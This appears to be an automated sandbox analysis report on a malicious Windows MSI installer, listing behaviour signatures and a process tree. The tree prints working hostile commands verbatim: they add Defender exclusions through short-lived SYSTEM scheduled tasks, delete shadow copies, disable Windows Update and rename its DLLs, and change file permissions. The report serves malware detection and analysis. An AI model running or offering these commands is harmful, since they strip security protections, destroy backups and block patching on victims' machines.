Analysis

  • max time kernel
    142s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    31/07/2026, 04:38

General

  • Target
    install_mal007.msi
  • Size 5.9MB
  • Sample260731-e9fcsscg37
  • SHA256 2dcc9972c15355c326b128771d83a6ccd03ec64af7a690f40373402db2393d82
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Disables service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 12 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 5 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 9 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 24 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 23 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_mal007.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4756
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4348
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1988
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 659A5A10882C5004B3722FACC34425A4 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:4524
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4680
  • C:\Users\Public\a2TlTw\i0f4mZ.exe
    C:\Users\Public\a2TlTw\i0f4mZ.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3592
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\a2TlTw\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:3472
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\a2TlTw\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2636
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:728
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:4792
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:2232
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4380
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:4636
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:1592
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:920
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2500
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4968
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:1800
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:4624
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:796
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:1648
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:3744
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:3504
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2340
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:2236
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2548
                        • C:\Program Files (x86)\atg70R\atg70R.exe
                          "C:\Program Files (x86)\atg70R\atg70R.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4060
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:416
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\atg70R" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:796
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\atg70R" /inheritance:r
                              4⤵
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4252
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3832
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\atg70R\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:728
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\atg70R\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1576
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:5112
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:5116
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                3⤵
                                • Executes a command shell one-liner
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:2636
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  4⤵
                                    PID:3524
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      5⤵
                                        PID:2360
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:2532
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure wuauserv reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:3444
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop UsoSvc
                                      4⤵
                                        PID:4128
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop UsoSvc
                                          5⤵
                                            PID:3844
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c echo.>c:\xxxx.ini
                                        3⤵
                                        • Executes a command shell one-liner
                                        • System Location Discovery: System Language Discovery
                                        PID:3124
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd.exe /c icacls "C:\Program Files (x86)\atg70R" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        3⤵
                                        • Executes a command shell one-liner
                                        PID:1956
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files (x86)\atg70R" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                          4⤵
                                          • Modifies file permissions
                                          PID:4036
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                        3⤵
                                        • Indicator Removal: Clear Persistence
                                        PID:4756
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:1256
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Run /TN "Task1"
                                          4⤵
                                            PID:1616
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            SCHTASKS /Delete /TN "Task1" /F
                                            4⤵
                                              PID:3776
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c icacls "C:\Program Files (x86)\atg70R" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                            3⤵
                                            • Executes a command shell one-liner
                                            PID:4160
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls "C:\Program Files (x86)\atg70R" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                              4⤵
                                              • Modifies file permissions
                                              PID:4556
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                            3⤵
                                            • Indicator Removal: Clear Persistence
                                            PID:4820
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                              4⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3420
                                            • C:\Windows\SysWOW64\schtasks.exe
                                              SCHTASKS /Run /TN "Task1"
                                              4⤵
                                                PID:1416
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                SCHTASKS /Delete /TN "Task1" /F
                                                4⤵
                                                  PID:2236
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c icacls "C:\Program Files (x86)\atg70R\atg70R.exe" /inheritance:r
                                                3⤵
                                                • Executes a command shell one-liner
                                                PID:2692
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Program Files (x86)\atg70R\atg70R.exe" /inheritance:r
                                                  4⤵
                                                  • Modifies file permissions
                                                  PID:1776
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                3⤵
                                                • Indicator Removal: Clear Persistence
                                                PID:1668
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                  4⤵
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:1328
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  SCHTASKS /Run /TN "Task1"
                                                  4⤵
                                                    PID:4248
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    SCHTASKS /Delete /TN "Task1" /F
                                                    4⤵
                                                      PID:2280
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c icacls "C:\Program Files (x86)\atg70R\atg70R.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                    3⤵
                                                    • Executes a command shell one-liner
                                                    PID:1604
                                                    • C:\Windows\SysWOW64\icacls.exe
                                                      icacls "C:\Program Files (x86)\atg70R\atg70R.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      4⤵
                                                      • Modifies file permissions
                                                      PID:5116
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c icacls "C:\Program Files (x86)\atg70R\atg70R.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                    3⤵
                                                    • Executes a command shell one-liner
                                                    PID:4668
                                                    • C:\Windows\SysWOW64\icacls.exe
                                                      icacls "C:\Program Files (x86)\atg70R\atg70R.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                      4⤵
                                                      • Modifies file permissions
                                                      PID:788
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c icacls "C:\Program Files (x86)\atg70R\image.png" /inheritance:r
                                                    3⤵
                                                    • Executes a command shell one-liner
                                                    PID:1520
                                                    • C:\Windows\SysWOW64\icacls.exe
                                                      icacls "C:\Program Files (x86)\atg70R\image.png" /inheritance:r
                                                      4⤵
                                                      • Modifies file permissions
                                                      PID:3944
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c icacls "C:\Program Files (x86)\atg70R\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                    3⤵
                                                    • Executes a command shell one-liner
                                                    PID:3064
                                                    • C:\Windows\SysWOW64\icacls.exe
                                                      icacls "C:\Program Files (x86)\atg70R\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      4⤵
                                                      • Modifies file permissions
                                                      PID:440
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd.exe /c icacls "C:\Program Files (x86)\atg70R\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                    3⤵
                                                    • Executes a command shell one-liner
                                                    PID:952
                                                    • C:\Windows\SysWOW64\icacls.exe
                                                      icacls "C:\Program Files (x86)\atg70R\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                      4⤵
                                                      • Modifies file permissions
                                                      PID:336
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                    3⤵
                                                    • Indicator Removal: Clear Persistence
                                                    PID:2136
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                                      4⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:2752
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      SCHTASKS /Run /TN "Task1"
                                                      4⤵
                                                        PID:4596
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        SCHTASKS /Delete /TN "Task1" /F
                                                        4⤵
                                                          PID:3768
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\atg70R\thumbs.db" /inheritance:r
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:2816
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\atg70R\thumbs.db" /inheritance:r
                                                          4⤵
                                                          • Modifies file permissions
                                                          PID:936
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\atg70R\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:1252
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\atg70R\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                          4⤵
                                                          • Modifies file permissions
                                                          PID:3148
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\atg70R\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:1256
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\atg70R\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                          4⤵
                                                          • Modifies file permissions
                                                          PID:1016
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\a2TlTw" /t REG_DWORD /d 0 /f
                                                    1⤵
                                                    • Executes a command shell one-liner
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4484
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\a2TlTw" /t REG_DWORD /d 0 /f
                                                      2⤵
                                                      • Windows security bypass
                                                      PID:2236
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd.exe
                                                    1⤵
                                                      PID:2748
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                      1⤵
                                                      • Executes a command shell one-liner
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3716
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                        2⤵
                                                        • Windows security bypass
                                                        PID:2176
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                      1⤵
                                                      • Executes a command shell one-liner
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3448
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                        2⤵
                                                        • Windows security bypass
                                                        PID:2024
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                      1⤵
                                                      • Executes a command shell one-liner
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3836
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                        2⤵
                                                        • Windows security bypass
                                                        PID:1312
                                                    • C:\Windows\system32\cmd.exe
                                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                      1⤵
                                                      • Executes a command shell one-liner
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4176
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                                        2⤵
